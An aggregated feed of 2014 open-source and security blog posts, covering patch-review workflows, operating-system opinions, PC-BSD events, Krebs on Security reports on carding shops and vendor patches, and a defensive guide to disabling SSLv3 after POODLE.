Sadly it is a necessary annoyance since otherwise the errors (and horrors) that would slip through would be much bigger and probably much more. If you do not care about code quality and what you are writing is not used by other people you can probably ignore that, if you feel somehow concerned that what you wrote might turn some people life in a sea of pain. (On the other hand some gratitude for such daunting effort is usually welcome).

Pull request management

The old fashioned way to issue a pull request is either poke somebody telling that your branch is ready for merge or just make a set of patches and mail them to whoever is in charge of integrating code to the main branch.

git provides a nifty tool to do that called git send-email and is quite common to send sets of patches (called usually series) to a mailing list. You get feedback by email and you can update the set using the --in-reply-to option and the message id.

Platforms such as github and similar are more web centric and require you to use the web interface to issue and review the request. No additional tools are required beside your git and a browser.

gerrit and reviewboard provide custom scripts to setup ephemeral branches in some staging area then the review process requires a browser again. Every commit gets some tool-specific metadata to ease tracking changes across series revisions. This approach the more setup intensive.

Pro and cons

Mailing list approach

Testing patches from the mailing list is quite simple thanks to git am. And if the reply-to field is used properly updates appear sorted in a good way.

This method is the simplest for the people used to have the email client always open and a console (if they are using a well configured emacs or vim they literally do not move away from the editor).

On the other hand, people using a webmail or using a basic email client might find the approach more cumbersome than a web based one.

If your only method to track contribution is just a mailing list, gets quite easy to forget which is the status of a set. Patches could be neglected and even who wrote them might forget for a long time.

Patchwork approach

Patchwork tracks which patches hit a mailing list and tries to figure out if they are eventually merged automatically.

It is quite basic: it provides an web interface to check the status and provides a mean to just update the patch status. The review must happen in the mailing list and there is no concept of series.

As basic as it is works as a reminder about pending patches but tends to get cluttered easily and keeping it clean requires some effort.

Github approach

The web interface makes much easier spot what is pending and what’s its status, people used to have everything in the browser (chrome and mozilla could be made to work as a decent IDE lately) might like it much better.

Reviewing small series or single patches is usually nicer but the current UIs do not scale for larger (5+) patchsets.

People not living in a browser find quite annoying switch context and it requires additional effort to contribute since you have to register to a website and the process of issuing a patch requires many additional steps while in the email approach just require to type git send-email -1.

Gerrit approach

The gerrit interfaces tend to be richer than the Github counterparts. That can be good or bad since they aren’t as immediate and tend to overwhelm new contributors.

You need to make an additional effort to setup your environment since you need some custom script.

The series are tracked with additional precision, but for all the practical usage is the same as github with the additional bourden for the contributor.

Introducing plaid

Plaid is my attempt to tackle the problem. It is currently unfinished and in dire need of more hands working on it.

It’s basic concept is to be non-intrusive as much as possible, retaining all the pros of the simple git+email workflow like patchwork does.

It provides already additional features such as the ability to manage series of patches and to track updates to it. It sports a view to get a break out of which series require a review and which are pending for a long time waiting for an update.

What’s pending is adding the ability to review it directly in the browser, send the review email for the web to the mailing list and a some more.

Probably I might complete it within the year or next spring, if you like Flask or python contributions are warmly welcome!

Realitätscheck: Betriebssysteme

by Jesco Freund via My Universe »

Zugegeben: ich liebe Flame Wars. Insbesondere dann, wenn es um das richtige™ Betriebssystem geht. In der Vergangenheit war ich ebenfalls nicht um kontroverse Beiträge zu solchen Flames verlegen — und seien wir mal ehrlich, wen hätte es nicht schon in den Fingern gejuckt? Wenn ich mir jedoch erlaube, einen Blick auf die heutige Realität in Sachen Betriebssysteme zu werfen, so muss ich ernüchtert feststellen, dass mir die Berechtigung zum Flamen zumindest teilweise abhanden gekommen ist.

Allein in meinem Arbeitszimmer teilen sich friedlich fünf Betriebssysteme vier verschiedene Geräte — die Workstation brummelt wahlweise unter Arch Linux vor sich hin, bootet bei Bedarf aber auch ein Windows 7 (hauptsächlich für die virtuelle Fliegerei), das MacBook arbeitet — Überraschung! — mit OS X, die Sun Blade mit Solaris und das Handy mit Android. Zählt man die körperlich ausgelagerten Maschinen mit hinzu, gesellen sich noch zwei FreeBSD-Installationen (jeweils auf Servern für Web, Mail und was einem sonst noch so in den Sinn kommen könnte) und ein Linux auf dem Home Server hinzu.

Kommerziell vs. Open Source

Für viele (mich in einem früheren Leben eingeschlossen) ist das eine moralisch-religiöse Frage und somit keine, die eine pragmatische Antwort erlaubt. Mittlerweile bin ich jedoch davon überzeugt, dass einer der Hauptfaktoren für die Beurteilung dieser Frage in den eigenen finanziellen Möglichkeiten steckt. Wer kein Geld für Software ausgeben möchte oder kann, wird in kostenpflichtigen Angeboten schon deshalb das ultimative Böse wittern, weil ihm selbst der Zugang (zumindest auf legalem Wege) zu selbigen verwehrt bleibt.

Sicher, wenn ich für ein Problem im FOSS-Bereich eine gute, passende Lösung entdecke, dann werde ich sie nutzen. Genauso wenig verzichte ich aber auf die Nutzung kommerzieller Software, wenn diese einen bestimmten Zweck eben besser erfüllt. Im übrigen ist es mir sogar lieber, wenn die von mir zu erbringende Leistung (z. B. eine Lizenzzahlung) klar erkennbar ist — Geschäftsmodelle, bei denen mir eine Leistung vermeintlich kostenlos angeboten wird, sind mir da schon eher suspekt. Das trifft natürlich nicht auf echte FOSS Produkte zu, wohl aber auf (vermeintlich) kostenlos nutzbare Dienste.

Und nicht zuletzt in gewisser Weise auch auf die kostenfreie Verteilung von Betriebssystemen, wie etwa Android oder OS X. Oder wie sollte man etwa Ubuntu Linux in diesem Kontext bewerten? Die Software selbst ist Open Source, aber anders als z. B. bei FreeBSD steht hinter Ubuntu keine gemeinnützige Stiftung, sondern mit Canonical ein Unternehmen, das in letzter Konsequenz Geld verdienen muss. Klar, auf Red Hat trifft das ebenfalls zu, nur ist hier das Geschäftsmodell transparent und klar erkennbar.

Technikgläubigkeit

Viele Argumente sprechen für oder gegen ein bestimmtes Betriebssystem — so glaubte auch ich, Linux sei Windows per se überlegen, und das nicht nur aus moralischen Gründen. Mit der Zeit lernt man, dass es zwar sehr wohl einen „Coolness-Faktor“ gibt — je nerdiger das System, desto besser. Dieser ist gleichwohl nicht zwangsweise proportional zur Eignung eines Betriebssystems für einen bestimmten Anwendungszweck.

Für viele Aufgaben im Arbeitsalltag nutze ich heute Arch Linux. Völlig unnerdig mit KDE, und nicht etwa mit einem der viel nerdigeren Tiling Window Manager. Der Grund ist einfach: Gewöhnung. Ich habe mich an die Stärken und Schwächen dieses Systems gewöhnt. Insbesondere letzteres wird oft verkannt: Die Fähigkeit, um die Schwächen eines Systems herumarbeiten zu können, muss man sich durch lange Nutzung und Erfahrung aneignen. Und seien wir ehrlich: jedes System hat Schwächen, genauso aber auch Stärken.

Das persönlich erworbene Wissen zum Umgang mit Schwächen und Stärken ist aus meiner Sicht ein weiterer starker Motivator in Flame Wars zum Thema Betriebssysteme. Offen sein für andere Systeme bedeutet nämlich schlicht, den eigenen Expertenstatus zur Disposition zu stellen — und wenn auch nur sich selbst gegenüber. Umgekehrt wird ebenfalls ein Schuh draus: Je breiter das eigene Wissen über viele Systeme gestreut ist, desto ausgeglichener und sachlicher wird die eigene Position — und taugt letztlich nicht mehr für Flame Wars…

Weichgespült?

Bedeutet das jetzt, dass ich nicht mehr über bestimmte Systeme oder Distributionen herziehen darf? Mitnichten ist das der Fall, nur die Argumente müssen andere sein, um noch glaubhaft zu erscheinen. Die Kritik fällt so denn auch weniger pauschal aus. Meine persönliche Liste an Dingen, die mir nicht gefallen, ist fast beliebig lang und hoppelt quer durch die Welt der Betriebssysteme. Logischerweise stehen jedoch ganz oben auf der Liste Themen, die mit dem von mir am häufigsten genutzten System in Zusammenhang stehen. Hier mal die Top 3:

  • Ich mag systemd nicht. Mehrwehrt gegenüber OpenRC oder normalen Init-Skripten: für mich als Endanwender Fehlanzeige, dafür aber reihenweise Probleme und unvorhergesehenes Fehlverhalten, plus höhere Komplexität in der Administration.
  • Selbiges gilt für PulseAudio, einem weiteren Poetterismus.
  • Ein alter Hut dagegen ist die kranke Code-Qualität der Glibc — für Leute, die portablen C Code schreiben müssen und hofften, sich auf den POSIX-Standard verlassen zu können, ein einziger Albtraum.
Obwohl diese Kritik in vollem Umfang Arch Linux mit KDE trifft, setze ich es weiterhin ein — in dem Moment, wo ein anderes OS den Platz von Arch Linux einnehmen würde, bestünden gute Chancen, dass sie die Reihenfolge meiner persönlichen Hass-Liste ändert.

Fazit

Häufig werden in Flame Wars Argumente gebracht, warum ein bestimmtes OS für einen bestimmten Zweck nicht geeignet ist — typischerweise dann auch in wenig sachlicher Form („Selbst schuld, du Opfer, wenn Du … einsetzt.“). In einer solchen Diskussion zu hinterfragen, warum denn System xy für einen bestimmten Zweck so gut geeignet sei, ist nicht nur hilfreich, um die Diskussion zu versachlichen, sondern kann auch noch diebischen Spaß machen. Vor allem, wenn man sich dabei die vermutlich zugrunde liegende Motivationslage der Diskussionsteilnehmer vor Augen hält…

Sublime Lebt

by Jesco Freund via My Universe »

Totgesagte leben länger — so oder so ähnlich haben sich das wohl die Macher von Sublime gedacht. Kurz nachdem schon überall im Internet die Schwanengesänge zu hören waren, wurde mit Nummer 3065 ein neuer Build veröffentlicht. Gut, auch das ist nun schon wieder fast zwei Monate her, aber immerhin ein Lebenszeichen.

Interessant an dem neuen Build: Es wurden nicht nur Bugs behoben und die Python API (minimal) aktualisiert — nein, denn u. a. mit Sidebar Icons sind auch neue Features in den Build mit eingeflossen. Nun gut, da mag so mancher argumentieren, dieses Feature sei von Atom geklaut — leugnen will ich das nicht; ein entsprechendes Plugin existiert für Atom schon länger.

A propos Atom: Obwohl mit selbigem eine gute Open Source Alternative zu Sublime existiert, ist letzteres für mich noch lange nicht aus dem Rennen. Der Grund ist geradezu banal: Atom zielt klar auf OS X Nutzer ab; nebenher ist es unter Arch Linux dank AUR auch noch einigermaßen wartbar. Windows-User hingegen werden systematisch vernachlässigt.

Sublime hingegen bietet auch für letztere fertig gebaute Binaries an — sogar in einer portablen Version, was es für mich besonders attraktiv macht. Schließlich habe ich auf Windows-Rechnern meines Brötchengebers keine Administratorrechte, was die Installation von Atom derzeit nahezu unmöglich macht.

Es bleibt also spannend: Wird Sublime 3 irgendwann fertig, oder schaffen es die Atom-Entwickler vorher, eine portable Windows-Version zur Verfügung zu stellen?

PC-BSD YouTube Channel

by Josh Smith via Official PC-BSD Blog »

Hey everyone just a quick heads up we’ve just started a PC-BSD YouTube channel!  If you want to check it out you can follow this link https://www.youtube.com/channel/UCyd7MaPVUpa-ueUsGjUujag.  Don’t forget to subscribe for new videos and if you have a video or tutorial you’d like to submit send it my way!  We only have a couple videos right now so we need your help to grow our channel :).  Also we’d love for you to submit your ideas we can do for videos in the future.

Thanks!

My ideal editor

by Flameeyes via Flameeyes's Weblog »


Photo credit: Stephen Dann
Some of you probably read me ranting on G+ and Twitter about blog post editors. I have been complaining about that since at least last year when Typo decided to start eating my drafts. After that almost meltdown I decided to look for alternatives on writing blog posts, first with Evernote – until they decided to reset everybody's password and required you to type some content from one of your notes to be able to get the new one – and then with Google Docs.

I have indeed kept using Google Docs until recently, when it started having some issues with dead keys. Because I have been using US International layout for years, and I'm too used to it when I write English too. If I am to use a non-deadkeys keyboard, I end up adding spaces where they shouldn't be. So even if it solves it by just switching the layout, I wouldn't want to write a long text with it that way.

Then I decided to give another try to Evernote, especially as the Samsung Galaxy Note 10.1 I bought last year came with a yet-to-activate 12 months subscription to the Pro version. Not that I find anything extremely useful in it, but…

It all worked well for a while until they decided to throw me into the new Beta editor, which follows all the newest trends in blog editors. Yes because there are trends in editors now! Away goes the full-width editing, instead you have a limited-width editing space in a mostly-white canvas with disappearing interface, like node.js's Ghost and Medium and now Publify (the new name of what used to be Typo).

And here's my problem: while I understand that they try to make things that look neat and that supposedly are there to help you "focus on writing" they miss the point quite a bit with me. Indeed, rather than having a fancy editor, I think Typo needs a better drafting mechanism that does not puke on itself when you start playing with dates and other similar details.

And Evernote's new editor is not much better; indeed last week, while I was in Paris, I decided to take half an afternoon to write about libtool – mostly because J-B has been facing some issues and I wanted to document the root causes I encountered – and after two hours of heavy writing, I got to Evernote, and the note is gone. Indeed it asked me to log back in. And I logged in that same morning.

When I complained about that on Twitter, the amount of snark and backward thinking I got surprised me. I was expecting some trolling, but I had people seriously suggesting me that you should not edit things online. What? In 2014? You've got to be kidding me.

But just to make that clear, yes I have used offline editing for a while back, as Typo's editor has been overly sensible to changes too many times. But it does not scale. I'm not always on the same device, not only I have three computers in my own apartment, but I have two more at work, and then I have tablets. It is not uncommon for me to start writing on a post on one laptop, then switch to the other – for instance because I need access to the smartcard reader to read some data – or to start writing a blog post while at a conference with my work laptop, and then finish it in my room on the personal one, and so on so forth.

Yes I could use Dropbox for out-of-band synchronization, but its handling of conflicts is not great, if you end up having one of the devices offline by mistake — better than the effets of it on password syncs but not so much better. Indeed I have bad experiences with that, because it makes it too easy to start working on something completely offline, and then forget to resync it before editing it from a different service.

Other suggestions included (again) the use of statically generated blogs. I have said before that I don't care for them and I don't want to hear them as suggestions. First they suffer from the same problems stated above with working offline, and secondly they don't really support comments as first class citizens: they require services such as Disqus, Google+ or Facebook to store the comments, including it in the page as an external iframe. I not only don't like the idea of farming out the comments to a different service in general, but I would be losing too many features: search within the blog, fine-grained control over commenting (all my blog posts are open to comment, but it's filtered down with my ModSecurity rules), and I'm not even sure they would allow me to import the current set of comments.

I wonder why, instead of playing with all the CSS and JavaScript to make the interface disappear, the editors' developers don't invest time to make the drafts bulletproof. Client-side offline storage should allow for preserving data even in case of being logged out or losing network connection. I know it's not easy (or I would be writing it myself) but it shouldn't be impossible, either. Right now it seems the bling is what everybody wants to work on, rather than functionality — it probably is easier to put in your portfolio, and that could be a good explanation as any.

PC-BSD at Ohio Linux Fest

by dru via Official PC-BSD Blog »

Several members of the PC-BSD and FreeBSD Projects will be at Ohio LinuxFest, to be held at the Greater Columbus Convention Center in Columbus, OH on October 24–26. Paid and free registration is available for this event.

Ken Moore will present “Lumina DE: A new desktop environment for PC-BSD” on Friday, October 11 at 11:00. Dru Lavigne will present “A Sneak Peak at FreeNAS 9.3″ on Friday, October 24 at 15:00. Dan Langille will present “Virtualization with FreeBSD Jails, ezjail, and ZFS” on Saturday, October 25 at 14:00.

There will be a FreeBSD booth in the expo area. Expo hours are 17:00–19:00 on Friday, October 24 and 8:00–17:00 on Saturday, October 25. As usual, we’ll have cool swag, PC-BSD DVDs, FreeNAS CDs, and will accept donations to the FreeBSD Foundation.

The BSDA certification exam will be available at 16:00 on Saturday, October 25 and at 10:00 on Sunday, October 26. The cost for the exam is $75.

PC-BSD at All Things Open

by dru via Official PC-BSD Blog »

There will be a FreeBSD booth in the expo area of All Things Open, to be held at the Raleigh Convention Center in Raleigh, NC on October 22–23. Registration is required for this event.

Expo hours are from 8:00–17:00 on Tuesday, October 21 and Wednesday, October 22. As usual, we’ll have some cool swag, PC-BSD DVDs, FreeNAS CDs, and brochures. We will also accept donations to the FreeBSD Foundation.

Bacula restore using a regex

by Dan Langille via Dan Langille's Other Diary »

Short version: I used this regex when restoring to a jail on the slocum server: !/\.zfs/snapshot/snapshot-for-backup/!/! Background Today I did this when setting up an ssh-key on a new host: ssh-add -L > ~/.ssh/authorized_keys Oh. That should have been >>. Restoring During the Bacula restore, I need to change this path: /usr/jails/mydev/.zfs/snapshot/snapshot-for-backup/usr/home/dan/.ssh/ to /usr/jails/mydev/usr/home/dan/.ssh/ That [...]

Seleznev Arrest Explains ‘2Pac’ Downtime

by BrianKrebs via Krebs on Security »

The U.S. Justice Department has piled on more charges against alleged cybercrime kingpin Roman Seleznev, a Russian national who made headlines in July when it emerged that he’d been whisked away to Guam by U.S. federal agents while vacationing in the Maldives. The additional charges against Seleznev may help explain the extended downtime at an extremely popular credit card fraud shop in the cybercrime underground.

The 2pac[dot]cc credit card shop.
The government alleges that the hacker known in the underground as “nCux” and “Bulba” was Roman Seleznev, a 30-year-old Russian citizen who was arrested in July 2014 by the U.S. Secret Service. According to Russian media reports, the young man is the son of a prominent Russian politician. Seleznev was initially identified by the government in 2012, when it named him as part of a conspiracy involving more than three dozen popular merchants on carder[dot]su, a bustling fraud forum where Bulba and other members openly marketed various cybercrime-oriented services (see the original indictment here).

According to Seleznev’s original indictment, he was allegedly part of a group that hacked into restaurants between 2009 and 2011 and planted malicious software to steal card data from store point-of-sale devices. The indictment further alleges that Seleznev and unnamed accomplices used his online monikers to sell stolen credit and debit cards at bulba[dot]cc and track2[dot]name. Customers of these services paid for their cards with virtual currencies, including WebMoney and Bitcoin.

But last week, U.S. prosecutors piled on another 11 felony counts against Seleznev, charging that he also sold stolen credit card data on a popular carding store called 2pac[dot]cc. Interestingly, Seleznev’s arrest coincides with a period of extended downtime on 2pac[dot]cc, during which time regular customers of the store could be seen complaining on cybercrime forums where the store was advertised that the proprietor of the shop had gone silent and was no longer responding to customer support inquiries.

A few weeks after Seleznev’s arrest, it appears that someone new began taking ownership of 2pac[dot]cc’s day-to-day operations. That individual recently posted a message on the carding shop’s home page apologizing for the extended outage and stating that fresh, new cards were once again being added to the shop’s inventory.

The message, dated Aug. 8, 2014, explains that the proprietor of the shop was unreachable because he was hospitalized following a car accident:

“Dear customers. We apologize for the inconvenience that you are experiencing now by the fact that there are no updates and [credit card] checker doesn’t work. This is due to the fact that our boss had a car accident and he is in hospital. We will solve all problems as soon as possible. Support always available, thank you for your understanding.”

2pac[dot]cc’s apologetic message to would-be customers of the credit card fraud shop.
IT’S ALL ABOUT CUSTOMER SERVICE 2pac is but one of dozens of fraud shops selling stolen debit and credit cards. And with news of new card breaches at major retailers surfacing practically each week, the underground is flush with inventory. The single most important factor that allows individual card shop owners to differentiate themselves among so much choice is providing excellent customer service.

Many card shops, including 2pac[dot]cc, try to keep customers happy by including an a-la-carte card-checking service that allows customers to test purchased cards using compromised merchant accounts — to verify that the cards are still active. Most card shop checkers are configured to automatically refund to the customer’s balance the value of any cards that come back as declined by the checking service.

This same card checking service also is built into rescator[dot]cc, a card shop profiled several times in this blog and perhaps best known as the source of cards stolen from the Target, Sally Beauty, P.F. Chang’s and Home Depot retail breaches. Shortly after breaking the news about the Target breach, I published a lengthy analysis of forum data that suggested Rescator was a young man based in Odessa, Ukraine.

Turns out, Rescator is a major supplier of stolen cards to other, competing card shops, including swiped1[dot]su — a carding shop that’s been around in various forms since at least 2008. That information came in a report (PDF) released today by Russian computer security firm Group-IB, which said it discovered a secret way to view the administrative statistics for the swiped1[dot]su Web site. Group-IB found that a user named Rescator was by far the single largest supplier of stolen cards to the shop, providing some 5,306,024 cards to the shop over the years.

Group-IB also listed the stats on how many of Rescator’s cards turned out to be useful for cybercriminal customers. Of the more than five million cards Rescator contributed to the shop, only 151,720 (2.8 percent) were sold. Another 421,801 expired before they could be sold. A total of 42,626 of the 151,720 — or about 28 percent – of Rescator’s cards that were sold on Swiped1[dot]su came back as declined when run through the site’s checking service.

The swiped1[dot]su login page.
Many readers have asked why the thieves responsible for the card breach at Home Depot collected cards from Home Depot customers for five months before selling the cards (on Rescator’s site, of course). After all, stolen credit cards don’t exactly age gracefully or grow more valuable over time. One possible explanation — supported by the swiped1[dot]su data and by my own reporting on this subject — is that veteran fraudsters like Rescator know that only a tiny fraction of stolen cards actually get sold. Based on interviews with several banks that were heavily impacted by the Target breach, for example, I have estimated that although Rescator and his band of thieves managed to steal some 40 million debit and credit card numbers in the Target breach, they likely only sold between one and three million of those cards.

The crooks in the Target breach were able to collect 40 million cards in approximately three weeks, mainly because they pulled the trigger on the heist on or around Black Friday, the busiest shopping day of the year and the official start of the holiday shopping season in the United States. My guess is that Rescator and his associates understood all too well how many cards they needed to steal from Home Depot to realize a certain number of sales and monetary return for the heist, and that they kept collecting cards until they had hit that magic number.

For anyone who’s interested, the investigation into swiped1[dot]su was part of a larger report that Group-IB published today, available here.

SSLv3

by Dag-Erling Smørgrav via May Contain Traces of Bolts »

UPDATE 2014-10-14 23:40 UTC The details have been published: meet the SSL POODLE attack.

UPDATE 2014-10-15 11:15 UTC Simpler server test method, corrected info about browsers

UPDATE 2014-10-15 16:00 UTC More information about client testing

El Reg posted an article earlier today about a purported flaw in SSL 3.0 which may or may not be real, but it’s been a bad year for SSL, we’re all on edge, and we’d rather be safe than sorry. So let’s take it at face value and see what we can do to protect ourselves. If nothing else, it will force us to inspect our systems and make conscious decisions about their configuration instead of trusting the default settings. What can we do?

The answer is simple: there is no reason to support SSL 3.0 these days. TLS 1.0 is fifteen years old and supported by every browser that matters and over 99% of websites. TLS 1.1 and TLS 1.2 are eight and six years old, respectively, and are supported by the latest versions of all major browsers (except for Safari on Mac OS X 10.8 or older), but are not as widely supported on the server side. So let’s disable SSL 2.0 and 3.0 and make sure that TLS 1.0, 1.1 and 1.2 are enabled.

What to do next

Test your server

The Qualys SSL Labs SSL Server Test analyzes a server and calculates a score based on the list of supported protocols and algorithms, the strength and validity of the server certificate, which mitigation techniques are implemented, and many other factors. It takes a while, but is well worth it. Anything less than a B is a disgrace.

If you’re in a hurry, the following command will attempt to connect to your server using SSL 2.0 or 3.0:

:|openssl s_client -ssl3 -connect www.example.net:443
If the last line it prints is DONE, you have work to do.

Fix your server

Disable SSL 2.0 and 3.0 and enable TLS 1.0, 1.1 and 1.2 and forward secrecy (ephemeral Diffie-Hellman).

For Apache users, the following line goes a long way:

SSLProtocol ALL -SSLv3 -SSLv2
It disables SSL 2.0 and 3.0, but does not modify the algorithm preference list, so your server may still prefer older, weaker ciphers and hashes over more recent, stronger ones. Nor does it enable Forward Secrecy.

The Mozilla wiki has an excellent guide for the most widely used web servers and proxies.

Test your client

The Poodle Test website will show you a picture of a poodle if your browser is vulnerable and a terrier otherwise. It is the easiest, quickest way I know of to test your client.

Qualys SSL Labs also have an SSL Client Test which does much the same for your client as the SSL Server Test does for your server; unfortunately, it is not able to reliably determine whether your browser supports SSL 3.0.

Fix your client

On Windows, use the Advanced tab in the Internet Properties dialog (confusingly not searchable by that name, search for “internet options” or “proxy server” instead) to disable SSL 2.0 and 3.0 for all browsers.

On Linux and BSD:

  • Firefox: open and set security.tls.version.min to 1. You can force this setting for all users by adding lockPref("security.tls.version.min", 1); to your system-wide Mozilla configuration file. Support for SSL 3.0 will be removed in the next release.

  • Chrome: open and select “show advanced settings”. There should be an HTTP/SSL section which lets you disable SSL 3.0 is apparently no way to disable SSL 3.0. Support for SSL 3.0 will be removed in the next release.

I do not have any information about Safari and Opera. Please comment (or email me) if you know how to disable SSL 3.0 in these browsers.

Good luck, and stay safe.

Removal of the Ubuntu-Touch code from Trojita git

by via jkt's blog »

Some of the recent releases of Trojitá, a fast Qt e-mail client, mentioned an ongoing work towards bringing the application to the Ubuntu Touch platform. It turns out that this won't be happening.

The developers who were working on the Ubuntu Touch UI decided that they would prefer to end working with upstream and instead focus on a standalone long-term fork of Trojitá called Dekko. The fork lives within the Launchpad ecosystem and we agreed that there's no point in keeping unmaintained and dead code in our repository anymore -- hence it's being removed.

One month in Turkey

by ultrabug via Ultrabug »

Our latest roadtrip was as amazing as it was challenging because we decided that we’d spend an entire month in Turkey and use our own motorbike to get there from Paris.

Transportation

Our main idea was to spare ourselves from the long hours of road riding to Turkey so we decided from the start to use ferries to get there. Turns out that it’s pretty easy as you have to go through Italy and Greece before you set foot in Bodrum, Turkey.

  • Paris -> Nice : train
  • Nice -> Parma (IT) -> Ancona : road, (~7h drive)
  • Ancona -> Patras (GR) : ferry (21h)
  • Patras -> Piraeus (Athens) : road (~4h drive, constructions)
  • Piraeus -> Kos : ferry (~11h by night)
  • Kos -> Bodrum (TR) : ferry (1h)
Turkish customs are very friendly and polite, it’s really easy to get in with your own vehicle.

Tribute to the Nightster

This roadtrip added 6000 kms to our brave and astonishing Harley-Davidson Nightster. We encountered no problem at all with the bike even though we clearly didn’t go easy on her. We rode on gravels, dirt and mud without her complaining, not to mention the weight of our luggages and the passengers

That’s why this post will be dedicated to our bike and I’ll share some of the photos I took of it during the trip. The real photos will come in some other posts.

A quick photo tour

I can’t describe well enough the pleasure and freedom feeling you get when travelling in motorbike so I hope those first photos will give you an idea.

I have to admit that it’s really impressive to leave your bike alone between the numerous trucks parking, loading/unloading their stuff a few centimeters from it.



 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

We arrived in Piraeus easily, time to buy tickets for the next boat to Kos.

  

 

 

 

 

 

 

Kos is quite a big island that you can discover best by … riding around !



After Bodrum, where we only spent the night, you quickly discover the true nature of Turkish roads and scenery. Animals are everywhere and sometimes on the road such as those donkeys below.



 

 

 

 

 

 

 

This is a view from the Bozburun bay. Two photos for two bike layouts : beach version and fully loaded version



 

 

 

 

 

 

 

On the way to Cappadocia, near Karapinar :



 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

The amazing landscapes of Cappadocia, after two weeks by the sea it felt cold up there.



 

 

 

 

 

 

 

Our last picture from the bike next to the trail leading to our favorite and lonely “private” beach on the Datça peninsula.



 

 

 

 

 

 

 

 

 

 

 


Microsoft, Adobe Push Critical Security Fixes

by BrianKrebs via Krebs on Security »

Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks that targeted NATO, Ukrainian and Western government organizations, and firms in the energy sector.

More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today is available at this link.

Separately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

Otherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).

July–September, 2014 Status Report

by Webmaster Team via FreeBSD News Flash »

The July–September, 2014 Status Report is now available.

Die neue Cisco AnyConnect Lizenzierung

by Karsten via Security-Planet.de »

Ein großer Vorteil der Cisco Remote-Access VPN-Lösung war bisher, dass die Lizenzierung recht einfach war und nicht pro  PC bezahhlt werden musste, auf dem der AnyConnect Client installiert war. Natürlich gab es auch Ärgernisse, z.B. dass AnyConnect Essentials und AnyConnect Premium nicht gemischt werden konnte.

Mit den aktuellen Änderungen für den neuen AnyConnect 4 wird zwar letzteres möglich sein, allerdings wird das gesamte Lizenzmodell deutlich aufwendiger. Was sich alles ändert:
Es gibt drei neue Lizenzstufen:

  • Plus Subscription
  • Plus Perpetual
  • Apex Subscription
Subscription heißt, dass man die Lizenz mit Laufzeiten von einem, drei und fünf Jahren erwerben kann. Die Lizenzierung des Headend Termination Devices (z.B. die ASA) ist unabhängig davon.
Im AnyConnect Plus sind die folgenden Features enthalten:

  • VPN
  • per App VPN (das ist neu in v4)
  • Web Security für CWS und WSA
  • Network Access Manager
Mit Ausnahme des neuen “per App VPNs” sieht das also ziemlich nach den bisherigen Features aus.
In der neuen AnyConnect Apex Lizenz kommen die folgenden Features dazu:

  • Posture
    Das gab es zwar vorher schon, neu ist aber, dass der AnyConnect Client jetzt auch für die ISE ab der kommenden Version 1.3 benutzt werden kann. Der alte NAC Posture Agent ist nicht mehr notwendig. Das ist eine Änderung, die schon lange überfällig ist. Erstaunlich, dass mir auf der diesjährigen Cisco Networkers von einem Cisco-Mitarbeiter noch gesagt wurde, dass dies auf absehbare Zeit nicht zu erwarten sei. 
  • Next Generation Crypto / Suite B
    Für Firmen, die für anständige Crypto extra Geld verlangen fallen mir viele Worte ein. Die könnte aber alle Einfluss auf potentielle Altersbeschränkungen dieser Seite haben …
  • Clientless VPN
    Was früher per AnyConnect Premium auf dem Headend Device lizenziert wurde, ist jetzt also von der Client-Lizenz abhängig.
Mit dem neuen AnyConnect benötigt jeder Client eine Lizens:

